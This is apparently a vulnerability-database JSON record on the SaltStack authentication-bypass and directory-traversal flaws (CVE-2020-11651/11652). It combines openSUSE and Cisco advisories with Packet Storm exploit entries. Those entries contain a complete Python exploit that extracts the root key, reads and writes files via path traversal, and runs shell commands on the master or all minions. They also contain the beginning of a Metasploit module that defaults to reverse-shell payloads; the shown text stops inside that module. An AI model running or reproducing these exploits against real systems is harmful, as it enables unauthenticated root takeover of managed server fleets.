openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-564=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-04-30T00:00:00", "id": "OPENSUSE-SU-2020:0564-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/SSOLZPKWSWDPR4VMI5Q3QMPA72BQNRCM/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-08T04:09:41", "description": "An update that solves four vulnerabilities and has 7 fixes\n is now available.\n\nDescription:\n\n This update for salt contains the following fixes:\n\n - Fix for TypeError in Tornado importer (bsc#1174165)\n - Require python3-distro only for TW (bsc#1173072)\n - Update to Salt version 3000: See release notes:\n https://docs.saltstack.com/en/latest/topics/releases/3000.html\n\n - Add docker.logout to docker execution module. (bsc#1165572)\n - Add option to enable/disable force refresh for zypper.\n - Add publish_batch to ClearFuncs exposed methods.\n - Adds test for zypper abbreviation fix.\n - Avoid segfault from \"salt-api\" under certain conditions of heavy load\n managing SSH minions. (bsc#1169604)\n - Avoid traceback on debug logging for swarm module. (bsc#1172075)\n - Batch mode now also correctly provides return value. (bsc#1168340)\n - Better import cache handline.\n - Do not make file.recurse state to fail when msgpack 0.5.4. (bsc#1167437)\n - Do not require vendored backports-abc. (bsc#1170288)\n - Fix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n - Fix for low rpm_lowpkg unit test.\n - Fix for temp folder definition in loader unit test.\n - Fix for unless requisite when pip is not installed.\n - Fix integration test failure for test_mod_del_repo_multiline_values.\n - Fix regression in service states with reload argument.\n - Fix tornado imports and missing _utils after rebasing patches.\n - Fix status attribute issue in aptpkg test.\n - Improved storage pool or network handling.\n - loop: fix variable names for until_no_eval.\n - Make \"salt.ext.tornado.gen\" to use \"salt.ext.backports_abc\" on Python 2.\n - Make setup.py script not to require setuptools greater than 9.1.\n - More robust remote port detection.\n - Prevent sporious \"salt-api\" stuck processes when managing SSH minions.\n because of logging deadlock. (bsc#1159284)\n - Python3.8 compatibility changes.\n - Removes unresolved merge conflict in yumpkg module.\n - Returns a the list of IPs filtered by the optional network list.\n - Revert broken changes to slspath made on Salt 3000\n (saltstack/salt#56341). (bsc#1170104)\n - Sanitize grains loaded from roster_grains.json cache during \"state.pkg\".\n - Various virt backports from 3000.2.\n - zypperpkg: filter patterns that start with dot. (bsc#1171906)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-1074=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-26T00:00:00", "type": "suse", "title": "Security update for salt (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-07-26T00:00:00", "id": "OPENSUSE-SU-2020:1074-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6GW2K66LI6CQMXXR5ABJWHGQK64P5J5Y/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-08T04:09:03", "description": "An update that solves 7 vulnerabilities, contains three\n features and has three fixes is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n Update to Salt release version 3002.2 (jsc#ECO-3212, jsc#SLE-18033,\n jsc#SLE-18028)\n\n - Check if dpkgnotify is executable (bsc#1186674)\n - Drop support for Python2. Obsoletes `python2-salt` package\n (jsc#SLE-18028)\n - virt module updates\n * network: handle missing ipv4 netmask attribute\n * more network support\n * PCI/USB host devices passthrough support\n - Set distro requirement to oldest supported version in\n requirements/base.txt\n - Bring missing part of async batch implementation back (CVE-2021-25315,\n bsc#1182382)\n - Always require `python3-distro` (bsc#1182293)\n - Remove deprecated warning that breaks minion execution when\n \"server_id_use_crc\" opts is missing\n - Fix pkg states when DEB package has \"all\" arch\n - Do not force beacons configuration to be a list.\n - Remove msgpack < 1.0.0 from base requirements (bsc#1176293)\n - msgpack support for version >= 1.0.0 (bsc#1171257)\n - Fix issue parsing errors in ansiblegate state module\n - Prevent command injection in the snapper module (bsc#1185281,\n CVE-2021-31607)\n - transactional_update: detect recursion in the executor\n - Add subpackage salt-transactional-update (jsc#SLE-18033)\n - Improvements on \"ansiblegate\" module (bsc#1185092):\n * New methods: ansible.targets / ansible.discover_playbooks\n - Add support for Alibaba Cloud Linux 2 (Aliyun Linux)\n - Regression fix of salt-ssh on processing targets\n - Update target fix for salt-ssh and avoiding race condition on salt-ssh\n event processing (bsc#1179831, bsc#1182281)\n - Add notify beacon for Debian/Ubuntu systems\n - Fix zmq bug that causes salt-call to freeze (bsc#1181368)\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-899=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2021-06-23T00:00:00", "id": "OPENSUSE-SU-2021:0899-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6E3YAO2VV3WBUS7PMAT26ZYDS3AXW5VL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-06T17:58:39", "description": "An update that solves 7 vulnerabilities, contains three\n features and has three fixes is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n Update to Salt release version 3002.2 (jsc#ECO-3212, jsc#SLE-18033,\n jsc#SLE-18028)\n\n - Check if dpkgnotify is executable (bsc#1186674)\n - Drop support for Python2. Obsoletes `python2-salt` package\n (jsc#SLE-18028)\n - virt module updates\n * network: handle missing ipv4 netmask attribute\n * more network support\n * PCI/USB host devices passthrough support\n - Set distro requirement to oldest supported version in\n requirements/base.txt\n - Bring missing part of async batch implementation back (CVE-2021-25315,\n bsc#1182382)\n - Always require `python3-distro` (bsc#1182293)\n - Remove deprecated warning that breaks minion execution when\n \"server_id_use_crc\" opts is missing\n - Fix pkg states when DEB package has \"all\" arch\n - Do not force beacons configuration to be a list.\n - Remove msgpack < 1.0.0 from base requirements (bsc#1176293)\n - msgpack support for version >= 1.0.0 (bsc#1171257)\n - Fix issue parsing errors in ansiblegate state module\n - Prevent command injection in the snapper module (bsc#1185281,\n CVE-2021-31607)\n - transactional_update: detect recursion in the executor\n - Add subpackage salt-transactional-update (jsc#SLE-18033)\n - Improvements on \"ansiblegate\" module (bsc#1185092):\n * New methods: ansible.targets / ansible.discover_playbooks\n - Add support for Alibaba Cloud Linux 2 (Aliyun Linux)\n - Regression fix of salt-ssh on processing targets\n - Update target fix for salt-ssh and avoiding race condition on salt-ssh\n event processing (bsc#1179831, bsc#1182281)\n - Add notify beacon for Debian/Ubuntu systems\n - Fix zmq bug that causes salt-call to freeze (bsc#1181368)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-2106=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-11T00:00:00", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2021-07-11T00:00:00", "id": "OPENSUSE-SU-2021:2106-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MU6P3NIODW6ZMC4HZLBROO6ZEOD5KAUX/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2022-12-22T12:18:43", "description": "On April 29, 2020, the Salt Open Core team notified their community regarding the following two CVE-IDs:\n\nCVE-2020-11651: Authentication Bypass Vulnerability\nCVE-2020-11652: Directory Traversal Vulnerability\n\nCisco Modeling Labs Corporate Edition (CML), Cisco TelePresence IX5000 Series, and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE) incorporate a version of SaltStack that is running the salt-master service that is affected by these vulnerabilities.\n\nCisco has released software updates that address these vulnerabilities. There are workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG\"]", "cvss3": {}, "published": "2020-05-28T16:00:00", "type": "cisco", "title": "SaltStack FrameWork Vulnerabilities Affecting Cisco Products", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-06-16T15:17:35", "id": "CISCO-SA-SALT-2VX545AG", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG", "cvss": {"score": 10.0, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}}], "packetstorm": [{"lastseen": "2020-08-31T07:08:45", "description": "", "cvss3": {}, "published": "2020-05-05T00:00:00", "type": "packetstorm", "title": "Saltstack 3000.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "PACKETSTORM:157560", "href": "https://packetstormsecurity.com/files/157560/Saltstack-3000.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Saltstack 3000.1 - Remote Code Execution \n# Date: 2020-05-04 \n# Exploit Author: Jasper Lievisse Adriaanse \n# Vendor Homepage: https://www.saltstack.com/ \n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* \n# Tested on: Debian 10 with Salt 2019.2.0 \n# CVE : CVE-2020-11651 and CVE-2020-11652 \n# Discription: Saltstack authentication bypass/remote code execution \n# \n# Source: https://github.com/jasperla/CVE-2020-11651-poc \n# This exploit is based on this checker script: \n# https://github.com/rossengeorgiev/salt-security-backports \n \n#!/usr/bin/env python \n# \n# Exploit for CVE-2020-11651 and CVE-2020-11652 \n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) \n# This exploit is based on this checker script: \n# https://github.com/rossengeorgiev/salt-security-backports \n \nfrom __future__ import absolute_import, print_function, unicode_literals \nimport argparse \nimport datetime \nimport os \nimport os.path \nimport sys \nimport time \n \nimport salt \nimport salt.version \nimport salt.transport.client \nimport salt.exceptions \n \ndef init_minion(master_ip, master_port): \nminion_config = { \n'transport': 'zeromq', \n'pki_dir': '/tmp', \n'id': 'root', \n'log_level': 'debug', \n'master_ip': master_ip, \n'master_port': master_port, \n'auth_timeout': 5, \n'auth_tries': 1, \n'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) \n} \n \nreturn salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') \n \n# --- check funcs ---- \n \ndef check_salt_version(): \nprint(\"[+] Salt version: {}\".format(salt.version.__version__)) \n \nvi = salt.version.__version_info__ \n \nif (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)): \nreturn True \nelse: \nreturn False \n \ndef check_connection(master_ip, master_port, channel): \nprint(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='') \nsys.stdout.flush() \n \n# connection check \ntry: \nchannel.send({'cmd':'ping'}, timeout=2) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"OFFLINE\") \nsys.exit(1) \nelse: \nprint(\"ONLINE\") \n \ndef check_CVE_2020_11651(channel): \nprint(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='') \nsys.stdout.flush() \n# try to evil \ntry: \nrets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"YES\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \npass \nfinally: \nif rets: \nroot_key = rets[2]['root'] \nreturn root_key \n \nreturn None \n \ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'cmd': 'get_token', \n'arg': [], \n'token': top_secret_file_path, \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"YES\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nprint(\"NO\") \n \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.read', \n'path': top_secret_file_path, \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nif rets['data']['return']: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef check_CVE_2020_11652_write1(debug, channel, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.write', \n'path': '../../../../../../../../tmp/salt_CVE_2020_11652', \n'data': 'evil', \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \n \npp(rets) \nif rets['data']['return'].startswith('Wrote'): \ntry: \nos.remove('/tmp/salt_CVE_2020_11652') \nexcept OSError: \nprint(\"Maybe?\") \nelse: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef check_CVE_2020_11652_write2(debug, channel, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'config.update_config', \n'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', \n'yaml_contents': 'evil', \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nif rets['data']['return'].startswith('Wrote'): \ntry: \nos.remove('/tmp/salt_CVE_2020_11652.conf') \nexcept OSError: \nprint(\"Maybe?\") \nelse: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef pwn_read_file(channel, root_key, path, master_ip): \nprint(\"[+] Attemping to read {} from {}\".format(path, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.read', \n'path': path, \n'saltenv': 'base', \n} \n \nrets = channel.send(msg, timeout=3) \nprint(rets['data']['return'][0][path]) \n \ndef pwn_upload_file(channel, root_key, src, dest, master_ip): \nprint(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip)) \nsys.stdout.flush() \n \ntry: \nfh = open(src, 'rb') \npayload = fh.read() \nfh.close() \nexcept Exception as e: \nprint('[-] Failed to read {}: {}'.format(src, e)) \nreturn \n \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.write', \n'saltenv': 'base', \n'data': payload, \n'path': dest, \n} \n \nrets = channel.send(msg, timeout=3) \nprint('[ ] {}'.format(rets['data']['return'])) \n \ndef pwn_exec(channel, root_key, cmd, master_ip, jid): \nprint(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': 'runner', \n'fun': 'salt.cmd', \n'saltenv': 'base', \n'user': 'sudo_user', \n'kwarg': { \n'fun': 'cmd.exec_code', \n'lang': 'python', \n'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd) \n}, \n'jid': jid, \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept Exception as e: \nprint('[-] Failed to submit job') \nreturn \n \nif rets.get('jid'): \nprint('[+] Successfully scheduled job: {}'.format(rets['jid'])) \n \ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid): \nprint(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': '_send_pub', \n'fun': 'cmd.run', \n'user': 'root', \n'arg': [ \"/bin/sh -c '{}'\".format(cmd) ], \n'tgt': '*', \n'tgt_type': 'glob', \n'ret': '', \n'jid': jid \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept Exception as e: \nprint('[-] Failed to submit job') \nreturn \nfinally: \nif rets == None: \nprint('[+] Successfully submitted job to all minions.') \nelse: \nprint('[-] Failed to submit job') \n \n \ndef main(): \nparser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652') \nparser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1') \nparser.add_argument('--port', '-p', dest='master_port', default='4506') \nparser.add_argument('--force', '-f', dest='force', default=False, action='store_false') \nparser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true') \nparser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true') \nparser.add_argument('--read', '-r', dest='read_file') \nparser.add_argument('--upload-src', dest='upload_src') \nparser.add_argument('--upload-dest', dest='upload_dest') \nparser.add_argument('--exec', dest='exec', help='Run a command on the master') \nparser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions') \nargs = parser.parse_args() \n \nprint(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\") \ntime.sleep(1) \n \n# Both src and destination are required for uploads \nif (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None): \nprint('[-] Must provide both --upload-src and --upload-dest') \nsys.exit(1) \n \nchannel = init_minion(args.master_ip, args.master_port) \n \nif check_salt_version(): \nprint(\"[ ] This version of salt is vulnerable! Check results below\") \nelif args.force: \nprint(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\") \nelse: \nsys.exit() \n \ncheck_connection(args.master_ip, args.master_port, channel) \n \nroot_key = check_CVE_2020_11651(channel) \nif root_key: \nprint('\\n[*] root key obtained: {}'.format(root_key)) \nelse: \nprint('[-] Failed to find root key...aborting') \nsys.exit(127) \n \nif args.run_checks: \n# Assuming this check runs on the master itself, create a file with \"secret\" content \n# and abuse CVE-2020-11652 to read it. \ntop_secret_file_path = '/tmp/salt_cve_teta' \nwith salt.utils.fopen(top_secret_file_path, 'w') as fd: \nfd.write(\"top secret\") \n \n# Again, this assumes we're running this check on the master itself \nwith salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd: \nroot_key = keyfd.read() \n \ncheck_CVE_2020_11652_read_token(debug, channel, top_secret_file_path) \ncheck_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key) \ncheck_CVE_2020_11652_write1(debug, channel, root_key) \ncheck_CVE_2020_11652_write2(debug, channel, root_key) \nos.remove(top_secret_file_path) \nsys.exit(0) \n \nif args.read_file: \npwn_read_file(channel, root_key, args.read_file, args.master_ip) \n \nif args.upload_src: \nif os.path.isabs(args.upload_dest): \nprint('[-] Destination path must be relative; aborting') \nsys.exit(1) \npwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip) \n \n \njid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow()) \n \nif args.exec: \npwn_exec(channel, root_key, args.exec, args.master_ip, jid) \n \nif args.exec_all: \nprint(\"[!] Lester, is this what you want? Hit ^C to abort.\") \ntime.sleep(2) \npwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157560/saltstack30001-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-17T09:39:05", "description": "", "cvss3": {}, "published": "2020-05-12T00:00:00", "type": "packetstorm", "title": "SaltStack Salt Master/Minion Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-12T00:00:00", "id": "PACKETSTORM:157678", "href": "https://packetstormsecurity.com/files/157678/SaltStack-Salt-Master-Minion-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::ZeroMQ \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE', \n'Description' => %q{ \nThis module exploits unauthenticated access to the runner() and \n_send_pub() methods in the SaltStack Salt master's ZeroMQ request \nserver, for versions 2019.2.3 and earlier and 3000.1 and earlier, to \nexecute code as root on either the master or on select minions. \n \nVMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are \nknown to be affected by the Salt vulnerabilities. \n \nTested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as \nwell as Vulhub's Docker image. \n}, \n'Author' => [ \n'F-Secure', # Discovery \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-11651'], # Auth bypass (used by this module) \n['CVE', '2020-11652'], # Authed directory traversals (not used here) \n['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'], \n['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'], \n['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py'] \n], \n'DisclosureDate' => '2020-04-30', # F-Secure advisory \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Master (Python payload)', \n'Description' => 'Executing Python payload on the master', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_https' \n} \n], \n[ \n'Master (Unix command)', \n'Description' => 'Executing Unix command on the master', \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n], \n[ \n'Minions (Python payload)', \n'Description' => 'Executing Python payload on the minions', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_https' \n} \n], \n[ \n'Minions (Unix command)', \n'Description' => 'Executing Unix command on the minions', \n'Type' => :unix_command, \n'DefaultOptions' => { \n# cmd/unix/reverse_python_ssl crashes in this target \n'PAYLOAD' => 'cmd/unix/reverse_python' \n} \n] \n], \n'DefaultTarget' => 0, # Defaults to master for safety \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key' \n}, \n'Notes' => { \n'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(4506), \nOptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/]) \n]) \n \nregister_advanced_options([ \nOptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10]) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \n# NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key \n \ndef exploit \n# check.reason is from auxiliary/gather/saltstack_salt_root_key \nif target.name.start_with?('Master') \nunless (root_key = check.reason) \nfail_with(Failure::BadConfig, \n\"#{target['Description']} requires a root key\") \nend \n \nprint_good(\"Successfully obtained root key: #{root_key}\") \nend \n \n# These are from Msf::Exploit::Remote::ZeroMQ \nzmq_connect \nzmq_negotiate \n \nprint_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\") \n \ncase target.name \nwhen /^Master/ \nyeet_runner(root_key) \nwhen /^Minions/ \nyeet_send_pub \nend \n \n# HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one \nsleep(wfs_delay) \nrescue EOFError, Rex::ConnectionError => e \nprint_error(\"#{e.class}: #{e.message}\") \nensure \n# This is from Msf::Exploit::Remote::ZeroMQ \nzmq_disconnect \nend \n \ndef yeet_runner(root_key) \nprint_status(\"Yeeting runner() at #{peer}\") \n 